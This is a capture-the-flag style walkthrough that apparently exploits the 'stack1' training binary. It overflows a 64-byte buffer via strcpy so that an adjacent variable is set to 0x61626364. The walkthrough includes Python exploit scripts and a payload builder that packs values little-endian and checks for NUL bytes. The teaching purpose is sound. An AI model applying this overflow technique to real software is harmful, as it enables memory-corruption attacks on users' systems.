The goal of this challenge is to overflow a buffer to modify the “modified” variable value to “0x61626364” and print the winning statement.
Things to note
modified = 0: So the “modified” variable is hardcoded to 0.
strcpy(buffer, argv[1]);: This is the vulnerable call in the program. It copies the user-supplied argument into the buffer with no length check, so if the argument is longer than the buffer, which is 64 bytes in this case (char buffer[64];), the copy keeps going past the end of the buffer and the BOF happens: the extra bytes land on whatever sits next to the buffer on the stack.
When we enter a random string like “bigb0ss”, we get the following output, showing modified = 0x00000000:
So, what is going on? Let’s look at the source code once again. It checks whether the “modified” value is 0x61626364 and, if not, prints the current value of “modified”. That value is still 0 because our 7-byte string fits comfortably inside the 64-byte buffer and nothing was overwritten.
But since we know that the buffer holds 64 bytes, when we supply 70 “A”s we get the following output:
0x41 is the ASCII code for a capital “A”. By supplying more bytes than the buffer can hold, we have overwritten the “modified” value: the 70-byte string ran past the end of the buffer and into the variable placed right after it. The next task is simple: (1) find the exact offset from the start of the buffer to “modified”; (2) put the target value 0x61626364 right at that offset.
Let’s create the following exploit with python (the program is run with the script’s output as its argument):
[Exploit-1]
```python
#!/usr/bin/python
padding = "A" * 60                 # 60 bytes of padding
padding += "BBBBCCCCDDDDEEEEFFFF"  # different letters, so we can tell which group lands in "modified"
print padding                      # the output is passed to stack1 as argv[1]
```
When we run this against the stack1 program, we now see the “modified” value is overwritten with 0x43434343 (0x43 = “C”). So the “CCCC” group is the one that lands on “modified”, and the offset is 64 bytes (60 “A”s plus “BBBB”).
Now we know that by swapping “CCCC” for our target value (0x61626364), we can print out the winning statement. Before that we have to write the value as the CPU stores it: x86 is little-endian, so the least significant byte (0x64, “d”) is written first and the most significant byte (0x61, “a”) last, which gives the string “dcba”. We can check those hex-to-ASCII conversions with python.
[Exploit-2]
```python
#!/usr/bin/python
padding = "A" * 64   # Offset (60 + BBBB)
padding += "dcba"    # Replacing "CCCC" with "dcba" (0x61626364 in little-endian byte order)
print padding        # the output is passed to stack1 as argv[1]
```
When it’s run, we get the winning statement!
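The two exploit scripts above hard-code the byte order by hand. As an added example (not code from the original post), here is a generalised payload builder that does the little-endian packing with struct, models what stack1 reads back from the 4 bytes at the offset, and checks for a constraint the post does not mention: strcpy() stops at the first NUL byte, and argv cannot carry one either, so a target value with a 0x00 byte anywhere but its last position cannot be delivered this way. It assumes the layout the post derived (a 64-byte buffer immediately followed by the 4-byte “modified” variable on a little-endian machine); the helper names are ours.

```python
#!/usr/bin/env python3
"""Build and sanity-check a stack1-style payload before sending it.

Added example, not from the original post. Assumes the post's layout:
a 64-byte buffer followed directly by the 4-byte `modified` variable,
little-endian (x86). Helper names below are our own.
"""
import struct
import sys

OFFSET = 64          # bytes from the start of buffer to `modified` (from the post)
TARGET = 0x61626364  # value the program compares `modified` against


def build_payload(offset, target):
    """Return `offset` filler bytes followed by `target` in little-endian order."""
    return b"A" * offset + struct.pack("<I", target)


def has_hidden_nul(payload):
    """True if a NUL byte sits before the last byte of the payload.

    strcpy() would stop copying there, and the shell cannot pass a NUL
    inside argv in the first place, so everything after it is lost.
    A NUL as the very last byte is harmless: strcpy writes one anyway.
    """
    nul = payload.find(b"\x00")
    return nul != -1 and nul != len(payload) - 1


def simulate_modified(payload, offset):
    """Model what stack1 prints: the 4 bytes at `offset`, read little-endian.

    `modified` is set to 0 before the copy, so bytes the payload does not
    reach stay 0 (strcpy's terminating NUL is 0 as well).
    """
    tail = payload[offset:offset + 4]
    tail = tail + b"\x00" * (4 - len(tail))
    return struct.unpack("<I", tail)[0]


if __name__ == "__main__":
    payload = build_payload(OFFSET, TARGET)
    if has_hidden_nul(payload):
        sys.exit("payload contains a NUL byte; strcpy would truncate it")
    # Write raw bytes so they can be passed as the argument:
    #   ./stack1 "$(python3 exploit.py)"
    sys.stdout.buffer.write(payload)
```

simulate_modified() reproduces the three observations from the post: 70 “A”s give 0x41414141, the “BBBBCCCC…” probe gives 0x43434343 at offset 64, and the final payload gives 0x61626364.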
Thanks for reading!